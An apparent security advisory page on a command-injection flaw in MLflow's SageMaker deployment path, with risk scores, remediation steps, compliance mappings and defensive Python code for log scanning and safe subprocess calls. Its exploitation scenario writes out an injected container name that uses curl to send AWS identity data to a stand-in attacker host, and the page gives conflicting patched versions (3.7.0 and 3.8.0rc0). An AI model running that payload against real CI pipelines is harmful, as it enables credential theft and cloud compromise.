CVE-2025-14287: mlflow: Code Injection enables RCE

GHSA-xch3-2f9x-wh9f HIGH CISA: ATTEND
Published March 16, 2026
CISO Take

MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.

What is the risk?

HIGH risk despite the absent CVSS score. Command injection via os.system() is a well-understood, reliable attack primitive — exploitation requires no special skills. The attack surface is broad: MLflow is pervasive in MLOps pipelines, and the vulnerable code path (SageMaker deployment) is a common production workflow. CI/CD pipelines that dynamically construct container image names from external sources (Git tags, webhook payloads, PR metadata) are the highest-risk targets. The privileges obtained depend on the process context — in containerized CI environments, the impact is potentially full host compromise if combined with a container escape.

What systems are affected?

Package: MLflow
Ecosystem: pip
Vulnerable Range: < 3.8.0rc0
Patched: 3.8.0rc0

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1: 7.5 / 10
EPSS: 1.2% chance of exploitation in 30 days (higher than 65% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Advanced
Exploitation Confidence: medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Attack Vector (AV): Network
Attack Complexity (AC): High
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

What should I do?

  1. PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation.
  2. DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter.
  3. WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+$).
  4. HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment.
  5. AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.
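The DETECT and WORKAROUND steps above can be scripted at the CI/CD layer. The following is an added example, not code from the advisory or from the MLflow project: it tightens the suggested allowlist into the lowercase OCI image-reference grammar (optional registry[:port]/, path components, optional :tag, optional @sha256:digest), pulls the --container value out of logged CLI invocations, and flags any value that carries shell metacharacters or fails the allowlist. The log format, runner names and image names are constructed for the example.

```python
import re
from typing import Optional

# Allowlist for container image references. This is an added, stricter
# reading of the advisory's suggested pattern: lowercase OCI repository
# grammar with an optional registry[:port]/ prefix, an optional :tag and an
# optional @sha256:digest. No shell metacharacter can pass it.
IMAGE_REF = re.compile(
    r"^(?:[a-z0-9][a-z0-9.-]*(?::[0-9]{1,5})?/)?"   # optional registry host[:port]/
    r"[a-z0-9]+(?:[._-][a-z0-9]+)*"                  # first path component
    r"(?:/[a-z0-9]+(?:[._-][a-z0-9]+)*)*"            # further path components
    r"(?::[A-Za-z0-9_][A-Za-z0-9_.-]{0,127})?"       # optional :tag
    r"(?:@sha256:[0-9a-f]{64})?$"                    # optional @sha256:digest
)

# Characters the advisory's DETECT step looks for, plus whitespace (word
# splitting turns one image argument into several), braces and redirections.
SHELL_META = re.compile(r"[;|&`$<>(){}\s]")

# Pulls the value handed to --container out of a logged CLI invocation:
# --container=value, --container value, or a quoted value after either form.
CONTAINER_ARG = re.compile(
    r"--container(?:=|\s+)(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)'|(?P<bare>\S+))"
)


def is_safe_image_ref(value: str) -> bool:
    """True only if value is a well-formed image reference under the allowlist."""
    return 0 < len(value) <= 255 and IMAGE_REF.fullmatch(value) is not None


def container_arg(line: str) -> Optional[str]:
    """Return the --container value from a logged command line, or None."""
    m = CONTAINER_ARG.search(line)
    if m is None:
        return None
    return next(g for g in m.groups() if g is not None)


def scan_log(text: str) -> list[dict]:
    """Flag every logged invocation whose --container value is hostile or malformed."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        value = container_arg(line)
        if value is None:
            continue
        if SHELL_META.search(value):
            reason = "shell metacharacter in --container value"
        elif not is_safe_image_ref(value):
            reason = "--container value is not a well-formed image reference"
        else:
            continue
        findings.append({"line": lineno, "value": value, "reason": reason})
    return findings


# Constructed sample CI log; runner names, job names and image names are invented.
SAMPLE_LOG = """\
2026-03-16T10:01:02Z ci-runner-7 INFO exec: mlflow sagemaker deploy -a churn-prod -m models:/churn/12 --container mlflow-pyfunc:3.7.0 --region us-east-1
2026-03-16T10:05:44Z ci-runner-7 INFO exec: mlflow sagemaker deploy -a churn-prod -m models:/churn/13 --container "mlflow-pyfunc:latest; echo injected" --region us-east-1
2026-03-16T10:07:10Z ci-runner-3 INFO exec: mlflow sagemaker deploy -a fraud -m models:/fraud/4 --container=123456789012.dkr.ecr.us-east-1.amazonaws.com/fraud-serving:v4
2026-03-16T10:09:31Z ci-runner-3 INFO exec: mlflow sagemaker deploy -a fraud -m models:/fraud/4 --container 'fraud-serving:v4`id`'
2026-03-16T10:10:05Z ci-runner-2 INFO exec: mlflow sagemaker deploy -a fraud -m models:/fraud/5 --container Fraud-Serving:v5
2026-03-16T10:11:00Z ci-runner-2 INFO exec: mlflow models serve -m models:/churn/13 -p 5000
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['reason']}: {f['value']!r}")
```

Run against the constructed log, the scan flags line 2 (command separator) and line 4 (backticks) as metacharacter hits, and line 5 (uppercase repository name) as malformed even though it contains no metacharacter; that second layer is why the allowlist check is worth keeping alongside the metacharacter search. The same is_safe_image_ref() check, placed before the pipeline ever invokes the CLI, is the WORKAROUND step.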

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  • Article 15 - Accuracy, robustness and cybersecurity
  • Article 9 - Risk management system
ISO 42001
  • 8.2 - AI risk assessment
  • 8.4 - AI system operation and monitoring
  • A.6.2.6 - Security of AI system
NIST AI RMF
  • GOVERN-1.7 - Organizational teams are committed to a culture that considers and communicates AI risk
  • MANAGE 2.2 - Mechanisms for tracking and managing AI risks
  • MANAGE-2.2 - Mechanisms to sustain the value of deployed AI with ongoing maintenance
OWASP LLM Top 10
  • LLM05:2025 - Supply Chain Vulnerabilities
  • LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-14287?

MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.

Is CVE-2025-14287 actively exploited?

No confirmed active exploitation of CVE-2025-14287 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-14287?

  1. PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation.
  2. DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter.
  3. WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+$).
  4. HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment.
  5. AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

What systems are affected by CVE-2025-14287?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms (MLflow-based), CI/CD pipelines for ML, Cloud ML deployments (AWS SageMaker), Model serving infrastructure, Training and deployment pipelines.

What is the CVSS score for CVE-2025-14287?

CVE-2025-14287 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 1.24%.

What is the AI security impact?

Affected AI Architectures

  • MLOps platforms (MLflow-based)
  • CI/CD pipelines for ML
  • Cloud ML deployments (AWS SageMaker)
  • Model serving infrastructure
  • Training and deployment pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.004 Container Registry
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials
AML.T0105 Escape to Host

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: 8.2, 8.4, A.6.2.6
NIST AI RMF: GOVERN-1.7, MANAGE 2.2, MANAGE-2.2
OWASP LLM Top 10: LLM05:2025, LLM06:2025

What are the technical details?

Original Advisory

A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.
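The root cause described above is the string-interpolation-into-os.system() pattern. The following added example (not MLflow's source and not its v3.7.0 patch, whose exact change this page does not show) places that vulnerable shape beside two hardened forms: the preferred argv list passed to subprocess without a shell, and the string-based fallback using shlex.quote(). The "docker tag" command, the ECR repository name and the benign "; echo injected" payload are assumptions constructed for the demonstration; the unsafe string is only tokenised the way a POSIX shell would read it, never executed, while the argv form is actually run through a child process (the Python interpreter standing in for the docker binary) to show the hostile value arriving as one inert argument.

```python
import json
import shlex
import subprocess
import sys

# Hypothetical target name; "docker tag" is assumed as the shape of the
# command the advisory describes, not MLflow's literal source.
FULLNAME = "123456789012.dkr.ecr.us-east-1.amazonaws.com/mlflow-pyfunc:3.7.0"


def unsafe_command(image: str, fullname: str) -> str:
    """The vulnerable shape: user input interpolated into a string that would
    be handed to os.system(), i.e. parsed by /bin/sh. Returned, never executed."""
    return f"docker tag {image} {fullname}"


def quoted_command(image: str, fullname: str) -> str:
    """String-based fallback: shlex.quote() makes each value exactly one shell word."""
    return f"docker tag {shlex.quote(image)} {shlex.quote(fullname)}"


def safe_argv(image: str, fullname: str) -> list:
    """Preferred fix: an argv list for subprocess.run(..., shell=False).
    No shell parses it, so metacharacters inside image are inert data."""
    return ["docker", "tag", image, fullname]


def shell_tokens(command: str) -> list:
    """Tokenise a command string the way a POSIX shell would, keeping the
    control operators ; | & as their own tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


SEPARATORS = {";", "|", "||", "&", "&&"}


def has_command_separator(command: str) -> bool:
    """True if a shell would see more than one command in the string."""
    return any(tok in SEPARATORS for tok in shell_tokens(command))


def argv_seen_by_child(argv_tail: list) -> list:
    """Run a child with an argv list and no shell, and return the argv it
    actually received. The current interpreter stands in for the docker
    binary so the check runs anywhere."""
    proc = subprocess.run(
        [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))", *argv_tail],
        capture_output=True, text=True, check=True,
    )
    return json.loads(proc.stdout)


if __name__ == "__main__":
    hostile = "mlflow-pyfunc:latest; echo injected"   # constructed, benign payload
    print("interpolated string splits into two commands:",
          has_command_separator(unsafe_command(hostile, FULLNAME)))
    print("shlex.quote() keeps it one word:",
          not has_command_separator(quoted_command(hostile, FULLNAME)))
    print("argv list reaches the child intact:",
          argv_seen_by_child(safe_argv(hostile, FULLNAME)[1:]))
```

The argv form is the one to reach for: it removes the shell from the call path entirely, so there is nothing left to escape. shlex.quote() is only worth using where a shell string is unavoidable (for example a command that must go through a remote shell), and even then the allowlist validation at the CI/CD layer should still run first.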

Exploitation Scenario

An adversary with write access to a Git repository (via compromised developer credentials or a malicious PR) modifies the CI/CD pipeline configuration to pass a crafted container image name such as legitimate-image:latest; curl -s http://attacker.com/$(aws sts get-caller-identity | base64) to the MLflow SageMaker deployment command. When the pipeline triggers, MLflow interpolates the unsanitized string directly into an os.system() call, executing the injected command in the context of the CI runner. The attacker receives AWS caller identity (credentials), then uses them to access S3 model buckets, enumerate SageMaker endpoints, and exfiltrate or replace production model artifacts. No user interaction beyond the normal pipeline execution is required.

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
March 16, 2026
Last Modified
March 17, 2026
First Seen
March 16, 2026

Related Vulnerabilities